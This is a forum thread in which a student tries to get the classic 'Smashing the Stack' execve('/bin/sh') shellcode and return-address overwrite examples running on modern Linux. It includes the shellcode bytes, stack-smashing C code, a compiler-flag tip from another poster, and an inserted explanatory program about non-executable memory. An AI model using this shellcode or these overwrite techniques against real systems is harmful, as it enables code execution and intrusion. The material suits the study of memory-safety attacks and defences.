Thread: Can't get sample shell code to work...

  1. #1
    Registered User
    Join Date
    Jul 2007
    Posts
    186

    Can't get sample shell code to work...

I'm learning about buffer overflows in class, so I looked up some stuff and stumbled upon a website with some sample code to overflow a buffer and make a shell. Here's the code below:
Code:
    /*
     * Run a shell via asm.  No embedded NULL's.
     *
     * Written by Aleph One - taken from 'Smashing The Stack For Fun And Profit".
     *
     */
    
    /* Machine code for the 32-bit x86 Linux execve("/bin/sh") stub from the paper,
     * kept verbatim; the trailing string is the program path it points at. */
    char shellcode[] =
    	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    	"\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
    int main(void) {
       int *ret;
    
       /* The paper's trick: treat the word two slots above the local 'ret' as
        * main's saved return address and point it at shellcode[]. This assumes
        * the paper's 32-bit frame layout and is undefined behaviour in C. */
       ret = (int *)&ret + 2;
       (*ret) = (int)shellcode;
    
       return 0;
    }
    It came from here: Shellcode : Linux

It says it was developed for Debian GNU/Linux and should work on other distributions without change. I'm using Ubuntu, and the code doesn't seem to be working. It doesn't launch a shell or anything. Should I try a Debian GNU/Linux distribution and see if it works? I've also tried running it remotely on one of my school's Linux terminals to no avail (CentOS).

  2. #2
    Registered User
    Join Date
    Sep 2006
    Posts
    8,868
    Ubuntu uses the Debian kernel, so I doubt that's the problem. The size of the int may make a difference, or possibly measures have been taken to stop that kind of security problem.
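As an added example (not code from the thread or from the paper), the program below shows one of the "measures" mentioned in post #2 from inside a running process: it reads /proc/self/maps (Linux only) and reports whether the page holding a given address is executable. On a modern distro a global array like shellcode[] lives in a writable but non-executable data segment, and the stack is non-executable as well, so a return into either faults instead of spawning a shell. The shellcode_placeholder array is a constructed stand-in, not the thread's shellcode.

```c
/* Added example: query the permissions of the mapping that contains an address
 * via /proc/self/maps (Linux). Shows why a global or stack buffer is normally
 * not executable on a modern system, one reason the thread's example fails. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed stand-in for the thread's shellcode[]: four NOP bytes, not a real payload. */
char shellcode_placeholder[] = "\x90\x90\x90\x90";

/* Parse one maps line ("start-end perms offset dev inode path").
 * Returns 1 on success, filling lo, hi and perms (5 bytes, e.g. "rw-p"). */
int parse_maps_line(const char *line, unsigned long *lo, unsigned long *hi, char perms[5]) {
    return sscanf(line, "%lx-%lx %4s", lo, hi, perms) == 3;
}

/* Find the mapping containing addr; copy its perms out and return 1, or 0 if
 * /proc/self/maps is unreadable or no mapping contains addr. */
int mapping_perms(const void *addr, char perms[5]) {
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t target = (uintptr_t)addr;
    int found = 0;
    if (!f) return 0;
    while (!found && fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char p[5];
        if (parse_maps_line(line, &lo, &hi, p) && target >= lo && target < hi) {
            memcpy(perms, p, 5);   /* perms field is 4 chars plus the NUL */
            found = 1;
        }
    }
    fclose(f);
    return found;
}

/* 1 if the page containing addr is executable, 0 if not, -1 if unknown. */
int is_executable(const void *addr) {
    char perms[5];
    if (!mapping_perms(addr, perms)) return -1;
    return perms[2] == 'x';
}

int main(void) {
    char local[16] = "stack buffer";   /* a stack object, like buffer1 in post #4 */
    printf("shellcode[] (.data) executable: %d\n", is_executable(shellcode_placeholder));
    printf("stack buffer executable:        %d\n", is_executable(local));
    printf("code (.text) executable:        %d\n", is_executable((void *)(uintptr_t)&is_executable));
    return 0;
}
```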

  3. #3
    Registered User
    Join Date
    Jul 2007
    Posts
    186
    That's interesting. I'm just trying to follow the tutorial, and they don't make any mention of any problems. They just seem to imply that it works, and they show it working. Here's the tutorial: Smashing the Stack for Fun and Profit by Aleph One

  4. #4
    Registered User
    Join Date
    Jul 2007
    Posts
    186
    Here's some simple code from the tutorial that I understand and yet it prints incorrect output:

The stack has buffer2 (takes up 12 bytes), buffer1 (takes up 8 bytes), the sfp (4 bytes), and the ret (4 bytes), since you have to address by word. So when I point ret to buffer1 and add 12, it's actually pointing to the return address. Then I bump up the return address by 8 (two words). So it should return to the print statement and skip the x = 1. However, it does execute the x = 1 statement and therefore prints out 1.

Code:
    #include <stdio.h>
    
    void function(int a, int b, int c) {
       char buffer1[5];
       char buffer2[10];
       int *ret;
    
       /* The paper assumes buffer1 is padded to 8 bytes and is followed by the
        * 4-byte saved frame pointer, so buffer1 + 12 is the return address slot.
        * This write is past the end of buffer1 and is undefined behaviour. */
       ret = (int *)(buffer1 + 12);
       (*ret) += 8;   /* skip the 8 bytes of code that do "x = 1" in main */
    }
    
    int main(void) {
      int x;
    
      x = 0;
      function(1,2,3);
      x = 1;
      printf("%d\n",x);
      return 0;
    }

  5. #5
    Registered User
    Join Date
    Jul 2007
    Posts
    186
    I was messing around with the simple code and changed it to this:
Code:
    #include <stdio.h>
    
    void function(int a, int b, int c) 
    {
       char buffer1[5];
       char buffer2[10];
       int i;
       int *ret;
    
       /* Print the address of every byte of both buffers to see how they are laid out. */
       for(i=0;i<5;i++)
          printf("%p\n",(void *)&buffer1[i]);
       for(i=0;i<10;i++)
         printf("%p\n",(void *)&buffer2[i]);
    
       /* Same out-of-bounds write as before, assuming the paper's layout. */
       ret = (int *)(buffer1 + 12);
       (*ret) += 8;
    }
    The output of this shows that memory is going up. So if I want to overwrite the return address, I can't be doing addition because addition will mess with buffer2. I need to be subtracting I think. Why would I be seeing these results when I'm sure tons of people have been using this code?

  6. #6
    Registered User
    Join Date
    Jul 2010
    Location
    Poland
    Posts
    1
There's only one thing you most probably missed while compiling this example. Just set the flag: -mpreferred-stack-boundary=2. It will set up the stack in dword-size increments. Should help.

  7. #7
and the hat of int overfl
    Join Date
    Aug 2001
    Location
    The edge of the known universe
    Posts
    39,659
    It might, if we cared about helping script kiddie wannabies from yesteryear - closed.
    If you dance barefoot on the broken glass of undefined behaviour, you've got to expect the occasional cut.
    If at first you don't succeed, try writing your phone number on the exam paper.
